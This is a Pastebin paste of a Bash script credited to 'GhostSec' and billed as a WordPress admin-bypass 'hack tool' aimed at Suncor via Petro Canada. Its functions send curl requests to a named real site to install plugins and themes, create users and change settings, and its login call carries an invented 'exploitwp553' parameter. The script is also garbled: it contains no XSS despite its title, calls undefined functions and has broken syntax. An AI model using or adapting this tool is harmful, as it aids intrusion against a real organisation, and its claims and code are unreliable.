API tools faq
paste
Advertisement
xGHOSTSECx

GhostPresser ( Hack Tool Designed To XSS Suncor Thru 3rd Party Petro Canada

xGHOSTSECx
Dec 24th, 2023
1,459
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 5.73 KB | None | 0 0
raw download clone embed print report
  1. bash
  2. #!/bin/bash
  3.  
  4. # GhostPresser Wordpress Admin Bypass And Hack Tool
  5. # Petro Canada Hack
  6. # We Are GhostSec
  7.  
  8. get_user_input() {
  9.     read -p "$1: " input_value
  10.     echo "$input_value"
  11. }
  12.  
  13. handle_error() {
  14.     local error_message="$1"
  15.     echo "Error: $error_message"
  16.     exit 1
  17. }
  18.  
  19. login_and_action() {
  20.     local wp_admin_user
  21.     local wp_admin_pass
  22.     local wp_url
  23.  
  24.     wp_admin_user=$(get_user_input "Enter WordPress Admin Username")
  25.     wp_admin_pass=$(get_user_input -s "Enter WordPress Admin Password")
  26.     wp_url=$(get_user_input "Enter WordPress URL")
  27.  
  28.     response=$(curl -s -X POST -d "log=$wp_admin_user&pwd=$wp_admin_pass&wp-submit=Log+In&redirect_to=$wp_url/wp-admin/plugins.php&testcookie=1&exploitwp553=1" "$wp_url/wp-login.php?action=postpass")
  29.  
  30.     if [[ $response == *"Error"* ]]; then
  31.         handle_error "Login failed. Check your credentials and try again."
  32.     else
  33.         echo "Login successful. Action performed."
  34.     fi
  35. }
  36.  
  37. activate_plugin() {
  38.     local plugin_name
  39.     local wordpress_logged_in_cookie
  40.  
  41.     plugin_name=$(get_user_input "Enter Plugin Name")
  42.     wordpress_logged_in_cookie=$(get_user_input "Enter WordPress Logged In Cookie")
  43.  
  44.     response=$(curl -s -X POST -d "plugin=$plugin_name&action=activate" -b "wordpress_logged_in_cookie=$wordpress_logged_in_cookie" https://karholdings.ca/wp-admin/admin-ajax.php)
  45.  
  46.     if [[ $response == *"Error"* ]]; then
  47.         handle_error "Plugin activation failed. Check the plugin name and try again."
  48.     else
  49.         echo "Plugin activation successful."
  50.     fi
  51. }
  52.  
  53. deactivate_plugin() {
  54.     local plugin_name
  55.     local wordpress_logged_in_cookie
  56.  
  57.     plugin_name=$(get_user_input "Enter Plugin Name")
  58.     wordpress_logged_in_cookie=$(get_user_input "Enter WordPress Logged In Cookie")
  59.  
  60.     response=$(curl -s -X POST -d "plugin=$plugin_name&action=deactivate" -b "wordpress_logged_in_cookie=$wordpress_logged_in_cookie" https://karholdings.ca/wp-admin/admin-ajax.php)
  61.  
  62.     if [[ $response == *"Error"* ]]; then
  63.         handle_error "Plugin deactivation failed. Check the plugin name and try again."
  64.     else
  65.         echo "Plugin deactivation successful."
  66.     fi
  67. }
  68.  
  69. update_core() {
  70.     local wordpress_logged_in_cookie
  71.  
  72.     wordpress_logged_in_cookie=$(get_user_input "Enter WordPress Logged In Cookie")
  73.  
  74.     response=$(curl -s -X POST -d "update-core=true" -b "wordpress_logged_in_cookie=$wordpress_logged_in_cookie" https://karholdings.ca/wp-admin/admin-ajax.php)
  75.  
  76.     if [[ $response == *"Error"* ]]; then
  77.         handle_error "WordPress core update failed. Check your credentials and try again."
  78.     else
  79.         echo "WordPress core update successful."
  80.     fi
  81. }
  82.  
  83. create_user() {
  84.     local new_user
  85.     local new_password
  86.     local new_user_email
  87.     local wordpress_logged_in_cookie
  88.  
  89.     new_user=$(get_user_input "Enter New User Name")
  90.     new_password=$(get_user_input -s "Enter New User Password")
  91.     new_user_email=$(get_user_input "Enter New User Email")
  92.     wordpress_logged_in_cookie=$(get_user_input "Enter WordPress Logged In Cookie")
  93.  
  94.     response=$(curl -s -X POST -d "user_login=$new_user&user_pass=$new_password&email=$new_user_email" -b "wordpress_logged_in_cookie=$wordpress_logged_in_cookie" https://karholdings.ca/wp-admin/admin-ajax.php)
  95.  
  96.     if [[ $response == *"Error"* ]]; then
  97.         handle_error "User creation failed. Check the user details and try again."
  98.     else
  99.         echo "User creation successful."
  100.     fi
  101. }
  102.  
  103. change_settings() {
  104.     local option_name
  105.     local option_value
  106.     local wordpress_logged_in_cookie
  107.  
  108.     option_name=$(get_user_input "Enter Option Name")
  109.     option_value=$(get_user_input "Enter New Option Value")
  110.     wordpress_logged_in_cookie=$(get_user_input "Enter WordPress Logged In Cookie")
  111.  
  112.     response=$(curl -s -X POST -d "option_name=$option_name&option_value=$option_value" -b "wordpress_logged_in_cookie=$wordpress_logged_in_cookie" https://karholdings.ca/wp-admin/admin-ajax.php)
  113.  
  114.     if [[ $response == *"Error"* ]]; then
  115.         handle_error "Changing site settings failed. Check the option details and try again."
  116.     else
  117.         echo "Site settings changed successfully."
  118.     fi
  119. }
  120.  
  121. install_theme() {
  122.     local theme_name
  123.     local wordpress_logged_in_cookie
  124.  
  125.     theme_name=$(get_user_input "Enter Theme Name")
  126.     wordpress_logged_in_cookie=$(get_user_input "Enter WordPress Logged In Cookie")
  127.  
  128.     response=$(curl -s -X POST -d "theme=$theme_name&action=install-theme" -b "wordpress_logged_in_cookie=$wordpress_logged_in_cookie" https://karholdings.ca/wp-admin/admin-ajax.php)
  129.  
  130.     if [[ $response == *"Error"* ]]; then
  131.         handle_error "Theme installation failed. Check the theme name and try again."
  132.     else
  133.         echo "Theme installation successful."
  134.     fi
  135.    
  136. }
  137.  
  138. while true; do
  139.     dialog --clear --backtitle "GhostPresser - WordPress Hack Tool" \
  140.         --title "Main Menu" \
  141.         --menu "Choose an option:" \
  142.         1 "Bypass Login and Perform Action" \
  143.         2 "Activate a Plugin" \
  144.         3 "Deactivate a Plugin" \
  145.         4 "Update WordPress Core" \
  146.         5 "Create a New User" \
  147.         6 "Change WordPress Settings" \
  148.         7 "Install a New Theme" \
  149.         8 "Perform Advanced Audit" \
  150.         9 "Perform Expert Audit" \
  151.         10 "Advanced Audit" \
  152.         11 "Expert Audit" \
  153.         12 "Exit" 2>
  154.        
  155.         choicecase $(<choice) in
  156.         1) bypass login_and_action ;;
  157.         2) activate_plugin ;;
  158.         3) deactivate_plugin ;;
  159.         4) update_core ;;
  160.         5) create_user ;;
  161.         6) change_settings ;;
  162.         7) install_theme ;;
  163.         8) perform_advanced_audit ;;
  164.         9) perform_expert_audit ;;
  165.         10) exit ;;
  166.         *) handle_error "Invalid choice. Please try again." ;;
  167.     esac
  168. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!